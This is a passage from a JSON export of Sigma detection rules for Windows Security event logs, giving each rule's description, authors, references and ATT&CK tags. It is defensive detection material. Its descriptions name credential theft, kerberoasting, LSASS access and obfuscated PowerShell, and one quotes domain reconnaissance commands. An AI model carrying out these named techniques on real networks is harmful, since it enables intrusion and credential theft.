], "filename": "win_security_susp_group_policy_startup_script_added_to_gpo.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_group_policy_startup_script_added_to_gpo.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1484.001", "attack.t1547" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "123e4e6d-b123-48f8-b261-7214938acaf0", "value": "Startup/Logon Script Added to Group Policy Object" }, { "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "meta": { "author": "Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Unlikely" ], "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.001", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" }, { "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-06-20", "falsepositive": [ "Unknown" ], "filename": "win_security_dpapi_domain_backupkey_extraction.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" ], "tags": [ "attack.credential-access", "attack.t1003.004" ] }, "related": [ { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", "value": "DPAPI Domain Backup Key Extraction" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": 
"b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" }, { "description": "Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.\n", "meta": { "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate OpenVPN TAP installation" ], "filename": "win_security_tap_driver_installation.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", "value": "Tap Driver Installation - Security" }, { "description": "Detects certificate creation with template allowing risk permission subject", "meta": { "author": "Orlinum , BlueDefenZer", "creation_date": "2021-11-17", "falsepositive": [ "Administrator activity", "Proxy SSL certificate with subject modification", "Smart card enrollement" ], "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access" ] }, "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", "value": "ADCS Certificate Template Configuration Vulnerability" }, { "description": "Detects locked workstation session events that occur automatically after a standard period of inactivity.", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-26", "falsepositive": [ "Likely" ], "filename": "win_security_workstation_was_locked.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], "tags": [ "attack.impact" ] }, "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", "value": "Locked Workstation" }, { "description": "Detects read access to a domain user from a non-machine account", "meta": { "author": "Maxime Thiebaut (@0xThiebaut)", "creation_date": "2020-03-30", "falsepositive": [ "Administrators configuring new users." 
], "filename": "win_security_ad_user_enumeration.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662", "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", "value": "Potential AD User Enumeration From Non-Machine Account" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "value": "Invoke-Obfuscation STDIN+ Launcher - Security" }, { "description": "Detects the creation of a user with the \"$\" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1387743867663958021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "value": "New or Renamed User Account with '$' Character" }, { "description": "Detects suspicious processes logging on with explicit credentials", "meta": { "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "creation_date": "2020-10-05", "falsepositive": [ "Administrators that use the RunAS command or scheduled tasks" ], "filename": "win_security_susp_logon_explicit_credentials.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" ], "tags": [ "attack.t1078", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", "value": "Suspicious Remote Logon with Explicit Credentials" }, { "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_replay_attack_detected.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" ], "tags": [ "attack.credential-access", "attack.t1558" ] }, "related": [ { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", "value": "Replay Attack Detected" }, { "description": "Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these 
modifications in Active Directory anyways.\n", "meta": { "author": "@neu5ron, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-11-19", "falsepositive": [ "Unknown" ], "filename": "win_security_disable_event_auditing.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", "value": "Windows Event Auditing Disabled" }, { "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_user_logoff.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", "value": "User Logoff Event" }, { "description": "Detects remote service activity via remote access to the svcctl named pipe", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_svcctl_remote_service.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" ], "tags": [ "attack.lateral-movement", "attack.persistence", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", "value": "Remote Service Activity via SVCCTL Named Pipe" }, { "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", "meta": { "author": "Cian Heasley", "creation_date": "2020-06-10", "falsepositive": [ "Unknown" ], "filename": "win_security_pcap_drivers.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pcap_drivers.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", "value": "Windows Pcap Drivers" }, { "description": "Detects failed Kerberos TGT issue 
operation. This can be a sign of manipulations of TGT messages by an attacker.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-10", "falsepositive": [ "Faulty legacy applications" ], "filename": "win_security_susp_kerberos_manipulation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" ], "tags": [ "attack.credential-access", "attack.t1212" ] }, "related": [ { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", "value": "Kerberos Manipulation" }, { "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning; we recommend filtering Account_Name to the Domain Controller computer accounts.\n", "meta": { "author": "Mauricio Velazco, Michael Haag", "creation_date": "2021-09-02", "falsepositive": [ "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
], "filename": "win_security_petitpotam_susp_tgt_request.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/topotam/PetitPotam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ "attack.credential-access", "attack.t1187" ] }, "related": [ { "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "value": "PetitPotam Suspicious Kerberos TGT Request" }, { "description": "Detects known sensitive file extensions accessed on a network share", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Help Desk operator doing backup or re-imaging end user machine or backup software", "Users working with these data types or exchanging message files" ], "filename": "win_security_susp_raccess_sensitive_fext.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" ], "tags": [ "attack.collection", "attack.t1039" ] }, "related": [ { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", "value": "Suspicious Access to Sensitive File Extensions" }, { "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", 
"meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-06-20", "falsepositive": [ "Unknown" ], "filename": "win_security_lsass_access_non_system_account.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "value": "LSASS Access From Non System Account" }, { "description": "This rule will collect the data needed to start looking into possible kerberoasting activity.\nFurther analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.\nYou can then set a threshold for the number of requests and time between the requests to turn this into an alert.\n", "meta": { "author": "@kostastsale", "creation_date": "2022-01-21", "falsepositive": [ "Legacy applications." 
], "filename": "win_security_kerberoasting_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=3513", "https://www.trustedsec.com/blog/art_of_kerberoast/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_kerberoasting_activity.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d04ae2b8-ad54-4de0-bd87-4bc1da66aa59", "value": "Kerberoasting Activity - Initial Query" }, { "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-05", "falsepositive": [ "Unknown" ], "filename": "win_security_dot_net_etw_tamper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://bunnyinside.com/?term=f71e8cb9c76a", "https://twitter.com/_xpn_/status/1268712093928378368", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", 
"https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "value": "ETW Logging Disabled In .NET Processes - Registry" }, { "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", "meta": { "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "creation_date": "2017-03-07", "falsepositive": [ "Administrator activity" ], "filename": "win_security_susp_net_recon_activity.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" ], "tags": [ "attack.discovery", "attack.t1087.002", "attack.t1069.002", "attack.s0039" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"968eef52-9cff-4454-8992-1e74b9cbad6c", "value": "Reconnaissance Activity" }, { "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduled tasks." ], "filename": "win_security_gpo_scheduledtasks.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/menasec1/status/1106899890377052160", "https://www.secureworks.com/blog/ransomware-as-a-distraction", "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" ], "tags": [ "attack.persistence", "attack.lateral-movement", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", "value": "Persistence and Execution at Scale via GPO Scheduled Task" }, { "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", "meta": { "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "The rule doesn't look for anything suspicious so false positives are expected. 
If you use one of the tools mentioned, comment it out" ], "filename": "win_security_service_install_remote_access_software.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_install_remote_access_software.yml" ], "tags": [ "attack.persistence", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8b00925-926c-47e3-beea-298fd563728e", "value": "Remote Access Tool Services Have Been Installed - Security" }, { "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", "meta": { "author": "@neu5ron", "creation_date": "2017-04-13", "falsepositive": [ "Unknown" ], "filename": "win_security_alert_ad_user_backdoors.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=3466", "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ "attack.t1098", "attack.persistence" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", "value": "Active Directory User Backdoors" }, { "description": "Detects powershell script installed as a 
Service", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "win_security_powershell_script_installed_as_service.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "value": "PowerShell Scripts Installed as Services - Security" }, { "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Web Browsers and third party application might generate similar activity. An initial baseline is required." 
], "filename": "win_security_susp_outbound_kerberos_connection.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Rubeus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" ], "tags": [ "attack.lateral-movement", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "value": "Uncommon Outbound Kerberos Connection - Security" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "value": "Invoke-Obfuscation Via Use MSHTA - Security" }, { "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", "meta": { "author": "Florian Roth (Nextron 
